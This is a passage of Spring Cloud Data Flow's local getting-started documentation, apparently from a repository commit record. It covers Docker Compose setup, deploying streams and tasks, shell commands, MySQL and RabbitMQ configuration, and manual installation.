\/tmp\/spring-cloud-dataflow-3784227772192239992\/httptest-1511755751505\/httptest.log-v3\ntail -f stdout_0.log\n----\n====\n\nYou should see log entries similar to the following:\n\n====\n[source,bash,options=nowrap]\n----\nINFO 21487 --- [ StateUpdate-2] o.s.c.d.spi.local.LocalAppDeployer : Deploying app with deploymentId httptest.log-v3 instance 0.\n Logs will be in \/tmp\/spring-cloud-dataflow-3784227772192239992\/httptest-1511755751505\/httptest.log-v3\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.strategies.HealthCheckStep : Waiting for apps in release httptest-v3 to be healthy.\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.s.HandleHealthCheckStep : Release httptest-v3 has been DEPLOYED\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.s.HandleHealthCheckStep : Apps in release httptest-v3 are healthy.\n----\n====\n\nNow you can post a message to the http source at port `9000`, as follows:\n\n====\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world upgraded\"\n----\n====\n\nThe log message in the log sink is now back at the info error level, as shown in the following example:\n\n====\n[source,bash]\n----\nINFO 23939 --- [http.httptest-1] log-sink : hello world rollback\n----\n====\n\nThe `history` command now shows that the third version of the stream has been deployed, as shown (with its output) in the following listing:\n\n====\n[source,bash]\n----\ndataflow:>stream history --name httptest\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Version\u2502 Last updated \u2502 Status \u2502Package Name\u2502Package Version\u2502 Description \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u25513 \u2502Mon Nov 27 23:01:13 EST 2017\u2502DEPLOYED\u2502httptest \u25021.0.0 \u2502Upgrade complete\u2551\n\u25512 \u2502Mon Nov 27 22:41:16 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u25511 \u2502Mon Nov 27 22:40:41 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\nIf you look at the manifest for version 3, you can see that it shows version 1.1.0.RELEASE for the log sink.\n\n\n\n=== Deploying Tasks\n\nThis section shows how to register a task, create a task definition, and then launch the task.\nWe then also review information about the task executions.\n\nNOTE: Launching Spring Cloud Task applications does not use delegation to Skipper, since they are short-lived applications. Tasks are always deployed directly thorugh the Data Flow Server.\n\n. Register a Task App\n+\nBy default, the application registry is empty.\nAs an example, we register one task application, `timestamp`, which simply prints the current time to the log.\nThe following command registers the timestamp application:\n+\n====\n[source,bash]\n----\ndataflow:>app register --name timestamp --type task --uri maven:\/\/org.springframework.cloud.task.app:timestamp-task:1.3.0.RELEASE\nSuccessfully registered application 'task:timestamp'\n----\n====\n+\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n\n. Create a Task Definition\n+\nYou can use the `task create` command to create a task definition that uses the previously registered `timestamp` application.\nIn the following example, no additional properties are used to configure the `timestamp` application:\n+\n====\n[source,bash]\n----\ndataflow:> task create --name printTimeStamp --definition \"timestamp\"\n----\n====\n\n. Launch a Task\n+\nThe launching of task definitions is done through the shell's `task launch` command, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:> task launch printTimeStamp\n----\n====\n+\nYou should check to see if the a timestamp ended up in the log file for the timestamp task.\nThe location of the log file for the task application appears in the Data Flow server\u2019s log.\nYou should see a log entry similar to the following:\n+\n====\n[source,bash]\n----\nTimestampTaskConfiguration$TimestampTask : 2018-02-28 16:42:21.051\n----\n====\n\n. Review task execution\n+\nYou can obtain information about the task execution by running the `task execution list` command, as the following example (with its output) shows:\n+\n====\n[source,bash]\n----\ndataflow:>task execution list\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 Task Name \u2502ID\u2502 Start Time \u2502 End Time \u2502Exit Code\u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551printTimeStamp\u25021 \u2502Wed Feb 28 16:42:21 EST 2018\u2502Wed Feb 28 16:42:21 EST 2018\u25020 \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n+\nYou can obtain additional information by running the command `task execution status`, as the following example (with its output) shows:\n+\n====\n[source,bash]\n----\ndataflow:>task execution status --id 1\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 Key \u2502 Value \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551Id \u25021 \u2551\n\u2551Name \u2502printTimeStamp \u2551\n\u2551Arguments \u2502[--spring.cloud.task.executionid=1] \u2551\n\u2551Job Execution Ids \u2502[] \u2551\n\u2551Start Time \u2502Wed Feb 28 16:42:21 EST 2018 \u2551\n\u2551End Time \u2502Wed Feb 28 16:42:21 EST 2018 \u2551\n\u2551Exit Code \u25020 \u2551\n\u2551Exit Message \u2502 \u2551\n\u2551Error Message \u2502 \u2551\n\u2551External Execution Id \u2502printTimeStamp-ab86b2cc-0508-4c1e-b33d-b3896d17fed7\u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\nThe <<spring-cloud-dataflow-task>> section has more information on the lifecycle of Tasks and how to use\n<<spring-cloud-dataflow-composed-tasks>>, which let you create a directed graph where each node of the graph is a task application.\n","old_contents":"[[getting-started-local]]\n== Getting Started - Local\n\n[partintro]\n--\nIf you are getting started with Spring Cloud Data Flow, this section is for you.\nIn this section, we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions.\nYou can find a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe then build an introductory Spring Cloud Data Flow application, discussing some core principles as we go.\n--\n\n\n[[getting-started-local-system-requirements]]\n=== System Requirements\n\nYou need Java 8 to run and to build you need to have Maven.\n\nBoth the Data Flow Server and Skipper Server need to have an RDBMS installed. The Data Flow Server stores stream and task definitions. It also stores the execution state of deployed tasks. The Skipper server stores the execution state of deployed streams.\n\nBy default, the Data Flow server uses embedded H2 database for this purpose but you can easily configure the server to use another external database.\n\nFor the deployed streams applications communicate a messaging middleware product needs to be installed.\nWe provide prebuilt stream applications that use link:http:\/\/www.rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka], however other https:\/\/cloud.spring.io\/spring-cloud-stream\/#binder-implementations[messaging middleware products] are supported.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker]]\n=== Getting Started with Docker Compose\n\nSpring Cloud Data Flow provides a Docker Compose file to let you quickly bring up Spring Cloud Data Flow, Skipper, and the Apache Kafka broker, instead of having to install them manually.\n\nNOTE: We recommended that you upgrade to the link:https:\/\/docs.docker.com\/compose\/install\/[latest version] of Docker before running the `docker-compose` command. We have tested it against Docker Engine version `18.09.2`\n\nThe following sections describe how to get started with Docker Compose:\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-download]]\n=== Downloading the Docker Compose File\n\nBefore you do anything else, you need to download the Docker Compose file. To do so:\n\n. Download the Spring Cloud Data Flow Server Docker Compose file:\n+\n====\n[source,bash,subs=attributes]\n----\n$ wget https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml\n----\n====\n\nNOTE: If the `wget` command is unavailable, you can use `curl` or another platform-specific utility. Alternatively, you can navigate to https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml[https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml] in a web browser and save the contents. Ensure the downloaded filename is `docker-compose.yml`.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-starting]]\n=== Starting Docker Compose\n\nTo get started, you need to start Docker Compose. To do so:\n\n. In the directory where you downloaded `docker-compose.yml`, start the system, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ export DATAFLOW_VERSION={local-server-image-tag}\n$ export SKIPPER_VERSION={skipper-version}\n$ docker-compose up\n----\n====\n\nThe `docker-compose.yml` file defines `DATAFLOW_VERSION` and `SKIPPER_VERSION` variables, so that those values can be easily changed. The preceding commands first set the `DATAFLOW_VERSION` and `SKIPPER_VERSION` to use in the environment. Then `docker-compose` is started.\n\nYou can also use a shorthand version that exposes only the `DATAFLOW_VERSION` and `SKIPPER_VERSION` variables to the `docker-compose` process (rather than setting it in the environment), as follows:\n\n====\n[source,bash,subs=attributes]\n----\n$ DATAFLOW_VERSION={local-server-image-tag} SKIPPER_VERSION={skipper-version} docker-compose up\n----\n====\n\nIf you use Windows, environment variables are defined by using the `set` command. To start the system on Windows, enter the following commands:\n\n====\n[source,bash,subs=attributes]\n----\nC:\\ set DATAFLOW_VERSION={local-server-image-tag}\nC:\\ set SKIPPER_VERSION={skipper-version}\nC:\\ docker-compose up\n----\n====\n\nNOTE: By default, Docker Compose use locally available images.\nFor example, when using the `latest` tag, run `docker-compose pull` prior to `docker-compose up` to ensure the latest image is downloaded.\n\nSpring Cloud Data Flow is ready for use once the `docker-compose` command stops emitting log messages.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-launch]]\n=== Launching Spring Cloud Data Flow\n\nNow that docker compose is up, you can launch the Spring Cloud Data Flow Dashboard. To do so, in your browser, navigate to the link:http:\/\/localhost:9393\/dashboard[Spring Cloud Data Flow Dashboard].\nBy default, the latest GA releases of Stream and Task applications are imported automatically.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-create-stream]]\n=== Creating a Stream\n\nTo create a stream:\n\n. In the menu, click *Streams*.\n. Click the *Create Stream(s)* button.\n+\nThe screen changes to the following image:\n+\n.Create Stream Page\nimage::images\/dataflow-create-stream-start.png[Create Stream Page, scaledwidth=\"60%\"]\n. In the text area, type `time | log`.\n. Click *Create Stream*.\n. Enter `ticktock` for the stream name, as shown in the following image:\n+\n.Creating a Stream\nimage::images\/dataflow-stream-create.png[Creating a Stream, scaledwidth=\"60%\"]\n. Click \"Create the stream\" button.\n+\nThe Definitions page appears.\n+\n.Definitions Page\nimage::images\/dataflow-definitions-page.png[Definitions Page, scaledwidth=\"60%\"]\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-deploy-stream]]\n=== Deploying a Stream\n\nNow that you have defined a stream, you can deploy it. To do so:\n\n. Click the play (deploy) button next to the \"`ticktock`\" definition that you created in the previous section.\n+\n.Initiate Deployment of a Stream\nimage::images\/dataflow-stream-definition-deploy.png[Creating a Stream, scaledwidth=\"60%\"]\n+\nThe UI shows the available properties that can be applied to the apps in the \"`ticktock`\" stream.\nThis example shown in the following image uses the defaults:\n+\n.Deployment Page\nimage::images\/dataflow-deploy-ticktock.png[Deloyment Page, scaledwidth=\"60%\"]\n. Click the *Deploy Stream* button.\n+\nThe UI returns to the Definitions page.\n+\nThe stream is now in \"`deploying`\" status, and its status becomes \"`deployed`\" when it is finished deploying.\nYou may need to refresh your browser to see the updated status.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-viewing-stream-logs]]\n=== Viewing Stream Logs\n\nOnce a stream is deployed, you can view its logs. To do so:\n\n. Click *Runtime* in the menu.\n. Click \"`ticktock.log`\".\n. Copy the path in the \"`stdout`\" text box on the dashboard\n. In another console window, type the following, replacing `\/path\/from\/stdout\/textbox\/in\/dashboard` with the value you copied in the previous step:\n+\n====\n[source,bash,subs=attributes]\n----\n$ docker exec -it skipper tail -f \/path\/from\/stdout\/textbox\/in\/dashboard\n----\n====\n+\nThe output of the log sink appears in the new window, printing a timestamp once per second.\n. When you have seen enough of that output, press Ctrl+C to end the `tail` command.\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-deleting-stream]]\n=== Deleting a Stream\n\nNow you can delete the stream you created. To do so:\n\n. Click *Streams* in the menu.\n. Click the down chevron on the \"`ticktock`\" row.\n. Click the *Destroy Stream*.\n. When prompted for confirmation, click *Destroy Stream Definition(s)*.\n\n=== Destroying the Quick Start Environment\n\nYou have finished the getting started guide for using Docker locally, so you can now shut down the environment you created by running `docker-compose up`. To do so:\n\n. Open a new terminal window.\n. Change directory to the directory in which you started (where the `docker-compose.yml` file is located).\n. Run the following command:\n+\n====\n[source,bash,subs=attributes]\n----\n$ DATAFLOW_VERSION={local-server-image-tag} SKIPPER_VERSION={skipper-version} docker-compose down\n----\n====\n+\n(You need to specify the `DATAFLOW_VERSION` and the `SKIPPER_VERSION` because you are running the command in a separate terminal window. The `export` commands you used earlier set the variables for only that terminal window, so those values are not found in the new terminal window. If all else fails, you can shut it down with Ctrl+C. Don't do that for non-demo instances, though.s)\n\nNOTE: Some stream applications may open a port, for example `http --server.port=`. By default, a port range of `9000-9010` is exposed from the container to the host. If you would need to change this range, you can modify the `ports` block of the `dataflow-server` service in the `docker-compose.yml` file.\n\n\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker]]\n\n==== Spring Cloud Data Flow Shell\n\nFor convenience and as an alternative to using the Spring Cloud Data Flow Dashboard, Spring Cloud Data Flow Shell is also included in the springcloud\/spring-cloud-dataflow-server Docker image.\nTo use it, open another console window and type the following:\n\n====\n[source,bash]\n----\n$ docker exec -it dataflow-server java -jar shell.jar\n----\n====\n\nUsing Spring Cloud Data Flow Shell is further described in <<shell,Shell>>.\n\n==== Spring Cloud Data Flow Monitoring\n\nBy default, the Data Flow `docker-compose` configures Stream monitoring with InfluxDB and pre-built dashboards for Grafana.\n\nFor further instructions about Data Flow monitoring, see <<streams-monitoring-local-influx,Streams Monitoring InfluxDB >>.\n\nimage::{dataflow-asciidoc}\/images\/grafana-influxdb-scdf-streams-dashboard.png[Grafana InfluxDB Dashboard, scaledwidth=\"50%\"]\n\n==== Docker Compose Customization\n\nOut of the box, Spring Cloud Data Flow uses the H2 embedded database for storing state and Kafka for communication.\nYou can make customizations to these components by editing the `docker-compose.yml` file. To do so:\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-mysql]]\n===== Using MySQL Rather than the H2 Embedded Database\n\nYou can use MySQL rather than the H2 embedded database.\nTo do so:\n\n. Add the following configuration under the `services` section:\n+\n====\n[source,yaml,subs=attributes]\n----\n mysql:\n image: mysql:5.7.25\n environment:\n MYSQL_DATABASE: dataflow\n MYSQL_USER: root\n MYSQL_ROOT_PASSWORD: rootpw\n expose:\n - 3306\n----\n====\n\n. Add the following entries to the `environment` block of the `dataflow-server` service definition:\n+\n====\n[source,yaml,subs=attributes]\n----\n - spring.datasource.url=jdbc:mysql:\/\/mysql:3306\/dataflow\n - spring.datasource.username=root\n - spring.datasource.password=rootpw\n - spring.datasource.driver-class-name=org.mariadb.jdbc.Driver\n----\n====\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-rabbitmq]]\n===== Using RabbitMQ Instead of Kafka for Communication\n\nYou can use RabbitMQ rather than Kafka for communication. To do so:\n\n. Replace the following configuration under the `services` section:\n+\n====\n[source,yaml,subs=attributes]\n----\n kafka:\n image: wurstmeister\/kafka:2.11-0.11.0.3\n expose:\n - \"9092\"\n environment:\n - KAFKA_ADVERTISED_PORT=9092\n - KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181\n - KAFKA_ADVERTISED_HOST_NAME=kafka\n zookeeper:\n image: wurstmeister\/zookeeper\n expose:\n - \"2181\"\n----\n====\n+\nWith the following:\n+\n====\n[source,yaml,subs=attributes]\n----\n rabbitmq:\n image: rabbitmq:3.7\n expose:\n - \"5672\"\n----\n====\n\n. In the `dataflow-server` services configuration block, add the following `environment` entry:\n+\n====\n[source,yaml,subs=attributes]\n----\n - spring.cloud.dataflow.applicationProperties.stream.spring.rabbitmq.host=rabbitmq\n----\n====\n\n. Replace the following:\n+\n====\n[source,yaml,subs=attributes]\n----\n depends_on:\n - kafka\n----\n====\n+\nWith:\n+\n[source,yaml,subs=attributes]\n====\n----\n depends_on:\n - rabbitmq\n----\n====\n\n. Modify the `app-import` service definition `command` attribute to replace `http:\/\/bit.ly\/Einstein-SR2-stream-applications-kafka-maven` with `http:\/\/bit.ly\/Einstein-SR2-stream-applications-rabbit-maven`.\n\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-mysql]]\n===== Enabling App Starters from the Host\n\nYou can enable `app starters` registration directly from the host machine.\nTo do so:\n\n. Mount the source host folders to the `dataflow-server` container.\n+\nFor example, if the `my-app.jar` is in the `\/thing1\/thing2\/apps` folder on your host machine, add the following `volumes` block to the `dataflow-server` service definition:\n+\n[source,yaml,subs=attributes]\n====\n----\n dataflow-server:\n image: springcloud\/spring-cloud-dataflow-server:${DATAFLOW_VERSION}\n container_name: dataflow-server\n ports:\n - \"9393:9393\"\n environment:\n - spring.cloud.dataflow.applicationProperties.stream.spring.cloud.stream.kafka.binder.brokers=kafka:9092\n - spring.cloud.dataflow.applicationProperties.stream.spring.cloud.stream.kafka.binder.zkNodes=zookeeper:2181\n volumes:\n - \/foo\/bar\/apps:\/root\/apps\n----\n====\n\nThis configuration provides access to the `my-app.jar` (and the other files in the folder) from within container's `\/root\/apps\/` folder. See the https:\/\/docs.docker.com\/compose\/compose-file\/compose-file-v2\/[compose-file reference] for further configuration details.\n\nNOTE: The explicit volume mounting couples docker-compose to your host's file system, limiting the portability to other machines and operating systems. Unlike `docker`, `docker-compose` does not allow volume mounting from the command line (for example, no `-v` parameter). Instead, you can define a placeholder environment variable (such as `HOST_APP_FOLDER`) in place of the hardcoded path by using `- ${HOST_APP_FOLDER}:\/root\/apps` and setting this variable before starting docker-compose.\n\nOnce you mount the host folder, you can register the app starters (from `\/root\/apps`), with the SCDF https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#shell[Shell] or https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#dashboard-apps[Dashboard] by using the `file:\/\/` URI schema.\nThe following example shows how to do so:\n\n====\n[source,bash,subs=attributes]\n----\ndataflow:>app register --type source --name my-app --uri file:\/\/root\/apps\/my-app-1.0.0.RELEASE.jar\n----\n====\n\nNOTE: You also need to use `--metadata-uri` if the metadata jar is available in the \/root\/apps.\n\nTo access the host's local maven repository from within the `dataflow-server` container, you should mount the host maven local repository (defaults to `~\/.m2` for OSX and Linux and `C:\\Documents and Settings\\{your-username}\\.m2` for Windows) to a `dataflow-server` volume called `\/root\/.m2\/`. For MacOS or Linux host machines, this looks like the following:\n\n====\n[source,yaml,subs=attributes]\n----\n dataflow-server:\n .........\n volumes:\n - ~\/.m2:\/root\/.m2\n----\n====\n\nNow you can use the `maven:\/\/` URI schema and Maven coordinates to resolve jars installed in the host's maven repository, as the following example shows:\n\n====\n[source,bash,subs=attributes]\n----\ndataflow:>app register --type processor --name pose-estimation --uri maven:\/\/org.springframework.cloud.stream.app:pose-estimation-processor-rabbit:2.0.2.BUILD-SNAPSHOT --metadata-uri maven:\/\/org.springframework.cloud.stream.app:pose-estimation-processor-rabbit:jar:metadata:2.0.2.BUILD-SNAPSHOT\n----\n====\n\nThis approach lets you share jars that are built and installed on the host machine (for example, by using `mvn clean install`) directly with the dataflow-server container.\n\nYou can also pre-register the apps directly in the docker-compose. For every pre-registered app starer, add an additional `wget` statement to the `app-import` block configuration, as the following example shows:\n\n====\n[source,yaml,subs=attributes]\n----\n app-import:\n image: alpine:3.7\n command: >\n \/bin\/sh -c \"\n ....\n wget -qO- 'http:\/\/dataflow-server:9393\/apps\/source\/my-app' --post-data='uri=file:\/root\/apps\/my-app.jar&metadata-uri=file:\/root\/apps\/my-app-metadata.jar';\n echo 'My custom apps imported'\"\n----\n====\n\nSee the https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#resources-registered-applications[SCDF REST API] for further details.\n\n\n\n[[getting-started-local-deploying-spring-cloud-dataflow]]\n=== Getting Started with Manual Installation\n\nIf Docker does not suit your needs, you can manually install the parts you need to run Spring Cloud Data Flow. To do so:\n\n. Download the Spring Cloud Data Flow Server by using the following command:\n+\n====\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-server\/{project-version}\/spring-cloud-dataflow-server-{project-version}.jar\n----\n====\n\n. Download the Spring Cloud Data Flow Shell application by using the following command:\n+\n====\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n====\n\n. If you need to enable Stream features, download http:\/\/cloud.spring.io\/spring-cloud-skipper\/[Skipper] (because Data Flow delegates to Skipper for those features), by running the following commands:\n+\n====\n[source,yaml,options=nowrap,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-server\/{skipper-version}\/spring-cloud-skipper-server-{skipper-version}.jar\n\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-shell\/{skipper-version}\/spring-cloud-skipper-shell-{skipper-version}.jar\n----\n====\n\nIMPORTANT: These instructions require that RabbitMQ be running on the same machine as Skipper and the Spring Cloud Data Flow server and shell.\n\n. Launch Skipper (required unless the Stream features are disabled and the Spring Cloud Data Flow runs in Task mode only). To do so, in the directory where you downloaded Skipper, run the server by using `java -jar`, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-skipper-server-{skipper-version}.jar\n----\n====\n\n. Launch the Data Flow Server\n+\nIn a different terminal window and in the directory where you downloaded Data Flow, run the server by using `java -jar`, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar\n----\n====\n+\nIf Skipper and the Data Flow server are not running on the same host, set the `spring.cloud.skipper.client.serverUri` configuration property to the location of Skipper, as shown in the following example\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar --spring.cloud.skipper.client.serverUri=http:\/\/192.51.100.1:7577\/api\n----\n====\n\n. In another terminal window, launch the Data Flow Shell by running the following command:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n====\n\nIf the Data Flow Server and shell are not running on the same host, you can also point the shell to the Data Flow server URL by using the `dataflow config server` command when in the shell's interactive mode.\n\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server URL, as the following example shows:\n\n====\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/198.51.100.0\nSuccessfully targeted http:\/\/198.51.100.0\ndataflow:>\n----\n====\n\nAlternatively, you can pass in the `--dataflow.uri` command line option. The shell's `--help` command line option shows what is available.\n\nIMPORTANT: If you run Spring Cloud Data Flow Server behind a proxy server (such as\nhttps:\/\/github.com\/Netflix\/zuul[Zuul]), you may also need to set the\n`server.use-forward-headers` property to `true`. An example that uses Zuul is available in the\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-dataflow-samples\/tree\/master\/dataflow-zuul[Spring Cloud Data Flow Samples repository]\non GitHub. Additional information is also available in the\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#howto-use-tomcat-behind-a-proxy-server[Spring Boot Reference Guide].\n\n[[getting-started-local-deploying-streams-spring-cloud-dataflow]]\n=== Deploying Streams\n\nDeploying streams requires that you first register some stream applications. By default, the application registry is empty.\nAs an example, register two applications, `http` and `log`, that communicate by using RabbitMQ. To do so, run the following commands:\n\n====\n[source,bash]\n----\ndataflow:>app register --name http --type source --uri maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'source:http'\n\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.1.0.RELEASE\nSuccessfully registered application 'sink:log'\n----\n====\n\nFor more details, such as how to register applications that are based on Docker containers or use Kafka as the messaging middleware, see the section on how to <<streams.adoc#spring-cloud-dataflow-register-stream-apps, register applications>>.\n\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n\nNow that you 